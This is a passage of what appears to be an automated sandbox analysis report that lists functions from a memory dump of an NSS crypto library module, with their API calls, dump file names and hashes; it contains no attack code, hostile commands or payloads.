Instruction ID: 5a92f42ef84a98eb149c6d8add044efdcb27f37ef59d5b7cc9230f87d748005e
Opcode Fuzzy Hash: 73c4dac5bfeb3272946767cfb387503c4e9e64ab2690ee3b378d90262b0d83e1
Instruction Fuzzy Hash: 7261B171B002059FDB54CF69D988AAA77B1FF89318F10853CED159BB80DB30AD06CB91

Function 6C7E29E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C7E21DD,00000000), ref: 6C7E2A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6C7E21DD,00000002,00000000,00000000,?,?,6C7E21DD,00000000), ref: 6C7E2A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C7E21DD,00000000), ref: 6C7E2A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7E2AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7E2B0D
PK11_FreeSymKey.NSS3(?), ref: 6C7E2B7B
PK11_FreeSymKey.NSS3(?), ref: 6C7E2BD6

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: 74f882c9f9ba052535dc469ce3757646e7e0c83e0f346438748761e0dbed1062
Instruction ID: f6bd8e08f16ce8f8c6e983beda9bafcc426cd626b229550b012cf0921b281630
Opcode Fuzzy Hash: 74f882c9f9ba052535dc469ce3757646e7e0c83e0f346438748761e0dbed1062
Instruction Fuzzy Hash: 3351F872E002069BEB109F65DE89BAB73B5AF4831CF150138ED196B791FB31E905C791

Function 6C7C8B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7C8B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6C7C8BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C7C8D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7C8D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7C8D72

Strings

OID., xrefs: 6C7C8BA4

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: OID.
API String ID: 4247295491-3585844982
Opcode ID: b1176a5796877dd91681871ecd5e01fdd06a788d82b2f74afe0dcf5ff94212d9
Instruction ID: c4e4b78aebf707687bcba79c03ff3bf60850e48d7630b5d07123bfcf57d5b7b0
Opcode Fuzzy Hash: b1176a5796877dd91681871ecd5e01fdd06a788d82b2f74afe0dcf5ff94212d9
Instruction Fuzzy Hash: 715119B1B0512A8FCB30CE18CD8179AB3B4EB69348F1445BBE919DBB41D3309D85CB96

Function 6C786980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6C785DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C785DEC
Part of subcall function 6C785DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C785E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7869BA

Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C779003,?), ref: 6C7CFD91
Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(A4686C7D,?), ref: 6C7CFDA2
Part of subcall function 6C7CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7D,?,?), ref: 6C7CFDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C786A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C786AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C786ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C786AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C786AE9

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: 136f8ed4fa40e908e4365846bd89d5ef10b2afc1e7c94b52d73a3623bb9766bb
Instruction ID: 45dc6cb4acc25aa42ed07fd0dd3c788eac4c9bc4ff9b56f57e7849f54d104d9b
Opcode Fuzzy Hash: 136f8ed4fa40e908e4365846bd89d5ef10b2afc1e7c94b52d73a3623bb9766bb
Instruction Fuzzy Hash: 9541C2B1641600ABEB10DF24ED49B9777E9BF84314F188438E95AC7641EF35EA01C7E2

Function 6C7D89A0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3 ref: 6C7D89DF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7D89EA
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7D8A04

Part of subcall function 6C7DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C7D800A,00000000,?,00000000,?), ref: 6C7DBC3F

PK11_PBEKeyGen.NSS3(00000000,?,?,00000000,?), ref: 6C7D8A47
PK11_GetInternalKeySlot.NSS3 ref: 6C7D8A7E
PK11_PBEKeyGen.NSS3(00000000,?,00000000,00000000,?), ref: 6C7D8A96

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7D8AD4

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$K11_Util$CriticalDeleteItem_Section$CopyInternalSlot$AlgorithmTag_Zfree
String ID:
API String ID: 3389286309-0
Opcode ID: bc6940c8146608e0685517333ee8afc8a20289ebb0a186905d21c268e9dd08e7
Instruction ID: 4d947ab7cd772bc8a91d5b1e4ab43d2f95f5e71557d0d75005a5c80d6f6904dc
Opcode Fuzzy Hash: bc6940c8146608e0685517333ee8afc8a20289ebb0a186905d21c268e9dd08e7
Instruction Fuzzy Hash: 2341D6756003007FD7009E69DE45B6B7768EB84B18F05407AFD189AB42EB32F91487E2

Function 6C7BAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC35

Part of subcall function 6C79CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C79CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC55

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E,?,?), ref: 6C7BAC70

Part of subcall function 6C79E300: TlsGetValue.KERNEL32 ref: 6C79E33C
Part of subcall function 6C79E300: EnterCriticalSection.KERNEL32(?), ref: 6C79E350
Part of subcall function 6C79E300: PR_Unlock.NSS3(?), ref: 6C79E5BC
Part of subcall function 6C79E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C79E5CA
Part of subcall function 6C79E300: TlsGetValue.KERNEL32 ref: 6C79E5F2
Part of subcall function 6C79E300: EnterCriticalSection.KERNEL32(?), ref: 6C79E606
Part of subcall function 6C79E300: PORT_Alloc_Util.NSS3(?), ref: 6C79E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C7BAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E), ref: 6C7BACD7
PORT_Alloc_Util.NSS3(?), ref: 6C7BAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C7BAD2B

Part of subcall function 6C79F360: TlsGetValue.KERNEL32(00000000,?,6C7BA904,?), ref: 6C79F38B
Part of subcall function 6C79F360: EnterCriticalSection.KERNEL32(?,?,?,6C7BA904,?), ref: 6C79F3A0
Part of subcall function 6C79F360: PR_Unlock.NSS3(?,?,?,?,6C7BA904,?), ref: 6C79F3D3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 8871a50d3e0623bad1c21d46d8cefd0280fc8b040e5a0a770a413914632d8285
Instruction ID: 75763f1e896428b55189167cf03b12e3c40a70d69ccbae5bc35ce2a8440c3234
Opcode Fuzzy Hash: 8871a50d3e0623bad1c21d46d8cefd0280fc8b040e5a0a770a413914632d8285
Instruction Fuzzy Hash: 6E3129B1E006055FEB00AF69DE459AF7776AF84328B198138E8156B741EB31ED0587A1

Function 6C772920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C77294E

Part of subcall function 6C7D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C771D97,?,?), ref: 6C7D1836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C77296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C772991

Part of subcall function 6C7D1820: PR_SetError.NSS3(FFFFE005,00000000,?,6C771D97,?,?), ref: 6C7D184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C7729AF
PR_Now.NSS3 ref: 6C772A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772A79

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: 011d562d75b6510c8002ed71573603c1e7be76e52b54f74826bcee6a6d047fd8
Instruction ID: cd7ba977301595e52b5ec83f4a91c628b078ed7659114442b5f115f9775d14ed
Opcode Fuzzy Hash: 011d562d75b6510c8002ed71573603c1e7be76e52b54f74826bcee6a6d047fd8
Instruction Fuzzy Hash: E041A671B093559FCB20CE29C944A5FB3E5BBC8714F064A2DFC9893700E730E9098792

Function 6C798C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C798C7C

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C798CB0
TlsGetValue.KERNEL32 ref: 6C798CD1
EnterCriticalSection.KERNEL32(?), ref: 6C798CE5
PR_Unlock.NSS3(?), ref: 6C798D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C798D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C798D93

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: a09e1d47aac0acbf48103f2a95008c7275061bdd1559db8309800eb0f3ff916e
Instruction ID: 76c7503d2d4712bcdab489a2ad3acf06ea938367a9810c266db842fc3984b6ef
Opcode Fuzzy Hash: a09e1d47aac0acbf48103f2a95008c7275061bdd1559db8309800eb0f3ff916e
Instruction Fuzzy Hash: 39316A71A01201AFDB109F68EE4579AB7B0BF59318F24013AEA1967F60D731B924C7C1

Function 6C792E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C78E728,?,00000038,?,?,00000000), ref: 6C792E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C792E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C792E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C792E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C792E9E
PR_Unlock.NSS3(?), ref: 6C792EAB
PR_Unlock.NSS3(?), ref: 6C792F0D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 740dc5fd66bc9a327244c286cf04eff12cb16ca2d8fad6196806f970791ac274
Instruction ID: 2e499803ba7e1f9422d58e2d95a73182a3db05ad09f1e7a5be23b047907b6d09
Opcode Fuzzy Hash: 740dc5fd66bc9a327244c286cf04eff12cb16ca2d8fad6196806f970791ac274
Instruction Fuzzy Hash: 97310579A00105ABEB11AF28ED8887AB779FF1525CB048174ED08C7B12EB31ED64C7E0

Function 6C7C4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C787296,00000000), ref: 6C7C4487
EnterCriticalSection.KERNEL32(?,?,?,6C787296,00000000), ref: 6C7C44A0
PR_Unlock.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C787296,00000000), ref: 6C7C4530
free.MOZGLUE(?,?,?,?,?,6C787296,00000000), ref: 6C7C453C
PORT_FreeArena_Util.NSS3 ref: 6C7C454F

Part of subcall function 6C7ACAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C78B1EE,D958E836,?,6C7C51C5), ref: 6C7ACAFA
Part of subcall function 6C7ACAA0: PR_UnloadLibrary.NSS3(?,6C7C51C5), ref: 6C7ACB09

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 227170735e9aa4a74d298255a773c4e27bb61a3280cb62afd528e0de64efd3d7
Instruction ID: 522a221ac3a079e225178d8cf4527b128d2bd7f9a1d56c99b5f7a17afda2dc29
Opcode Fuzzy Hash: 227170735e9aa4a74d298255a773c4e27bb61a3280cb62afd528e0de64efd3d7
Instruction Fuzzy Hash: D6315CB4B04A029FDB10AF79D288669B7F0FF05319F014639E89997B01E734E894DBC2

Function 6C7DCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C7DCD93,?), ref: 6C7DCEEE

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7DCD93,?), ref: 6C7DCEFC

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7DCD93,?), ref: 6C7DCF0B

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7DCD93,?), ref: 6C7DCF1D

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C7DCD93,?,?,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF78

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 23b06cac301ea6622304fdb487724930ff259abdcd1d6d36b82333cd1203ff25
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 3311BBB6F002055BE7006EB67E49BABB6EC9F5455EF054039EC09D7741FB60E908C6B2

Function 6C788C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C788C1B
EnterCriticalSection.KERNEL32 ref: 6C788C34
PL_ArenaAllocate.NSS3 ref: 6C788C65
PR_Unlock.NSS3 ref: 6C788C9C
PR_Unlock.NSS3 ref: 6C788CB6

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Strings

KRAM, xrefs: 6C788C8F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b0012d1370203f31cb28ae6fafcd37da2357e9389affb33c410e3dd991e73925
Instruction ID: 547ec394d24962ed5b105f2fa450ea0697163e601ddea7ecd06b024d54738e29
Opcode Fuzzy Hash: b0012d1370203f31cb28ae6fafcd37da2357e9389affb33c410e3dd991e73925
Instruction Fuzzy Hash: 792180B1A066018FD700AF79C588559BBF4FF05318F0589BED988CB701DB31D885CB81

Function 6C798E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

